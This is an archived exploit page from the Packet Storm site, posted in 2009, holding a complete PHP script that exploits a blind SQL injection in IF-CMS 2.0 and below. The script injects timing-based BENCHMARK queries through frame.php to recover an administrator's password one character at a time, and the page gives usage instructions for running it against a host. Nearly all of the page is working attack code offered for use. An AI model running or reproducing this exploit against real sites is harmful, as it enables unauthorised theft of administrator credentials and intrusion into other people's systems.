what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

IF-CMS 2.0 Blind SQL Injection

IF-CMS 2.0 Blind SQL Injection
Posted Feb 9, 2009
Authored by darkjoker | Site darkjokerside.altervista.org

IF-CMS versions 2.0 and below remote blind SQL injection exploit that leverages frame.php.

tags | exploit, remote, php, sql injection
SHA-256 | 495902f6a4d4fa1816cfba9536809df78c18965cb272a62be4c63568e1a3fe2e

IF-CMS 2.0 Blind SQL Injection

Change Mirror Download
--+++=======================================================+++--
--+++====== IF-CMS <= 2.0 Blind SQL Injection Exploit ======+++--
--+++=======================================================+++--

<?php

function query ($username, $char, $pos)
{
//Increase benchmark when exploit prints uncorrect passwords

$query = "x' OR IF ((ASCII(SUBSTRING((SELECT pass FROM rns_admin WHERE ".
"nick = '{$username}'),{$pos},1))={$char}), BENCHMARK(100000000,CHAR(0)),0) OR '1' = '2";
$query = str_replace (" ", "%20", $query);
$query = str_replace ("'", "%27", $query);
return $query;
}

function exploit ($hostname, $path, $username, $char, $pos)
{
$char = ord ($char);
$fp = fsockopen ($hostname, 80);
$get = "GET {$path}/frame.php?id=". query ($username, $char, $pos) . " HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";
$a = time ();
fputs ($fp, $get);
while (!feof ($fp))
fgets ($fp, 1024);

fclose ($fp);
$a = time () - $a;
if ($a > 4)
return true;
else
return false;

}

function usage ()
{
echo "\nIF-CMS <= 2.0 Blind SQL Injection Exploit".
"\n[+] Author : darkjoker".
"\n[+] Site : http://darkjoker.net23.net".
"\n[+] Download: http://downloads.sourceforge.net/if-cms/If-CMS-2.07.zip?modtime=1088812800&big_mirror=0".
"\n[+] Usage : php xpl.php <hostname> <path> <username>".
"\n[+] Ex. : php xpl.php localhost /IF-CMS root".
"\n\n";
exit ();
}

if ($argc != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$user = $argv [3];
//Edit this keylist when returned password is incomplete and add other characters you want
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$chr = 0;
$pos = 1;
echo "[+] Password: ";
while ($chr < strlen ($key))
{
if (exploit ($hostname, $path, $user, $key [$chr], $pos))
{
echo $key [$chr];
$chr = 0;
$pos++;
}
else
$chr++;
}
echo "\n\n";
?>

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close